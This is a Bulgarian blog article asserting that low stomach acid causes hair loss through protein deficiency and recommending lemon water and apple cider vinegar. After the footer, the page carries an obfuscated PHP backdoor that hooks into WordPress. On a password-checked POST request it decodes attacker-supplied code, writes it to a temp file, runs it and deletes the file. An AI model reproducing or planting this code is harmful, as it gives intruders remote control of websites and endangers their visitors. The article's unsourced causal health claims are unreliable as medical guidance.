Ниските нива на стомашната киселина водят до косопад | Косопад

Ниските нива на стомашната киселина водят до косопад

stomashna-kiselina

Стомашната киселина е изключително важна за тялото ни – участва в храносмилането и усвояването на протеини, витамини (В12, тиамин, фолиева киселина) и минерали (желязо, калций, магнезий, селен и цинк).

Без достатъчно стомашна киселина тялото не може да храносмила и да усвоява аминокиселините за производството на протеини. А това не позволява да се синтезира достатъчно колаген, води до топене на мускулатурата и до косопад.

Стомашната киселина също ни предпазва от инфекции, стерилизира храната ни, предпазва от кандида, не позволява несмелени части от храната да попаднат в кръвоносната система и пр.

kosopad-estrogen

Ако стомашната киселина не е достатъчно, протеините не се обработват правилно, а дефицитът на протеини води до редица проблеми. Освен за косата и ноктите, те са жизненоважни за мускулатурата на сърцето, както и на други важни органи.

Така че, ако имате дефицит на протеини, първо ще се отрази на ноктите и косата ви.

Как да увеличим стомашната киселина?

1. Пийте топла вода с лимонов сок на гладно. Това е много полезна рецепта, която се приема сутрин на гладно. Едно от свойствата й е да стимулира производството на стомашна киселина.

2. Пийте ябълков оцет. Взимайте по една лъжица ябълков оцет преди всяко хранене в продължение на 1- 2 седмици. Започнете с по- малко количество, разтворено във вода, докато свикнете. Не го приемайте повече от две седмици.

18. септември 2015 15:34:37 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}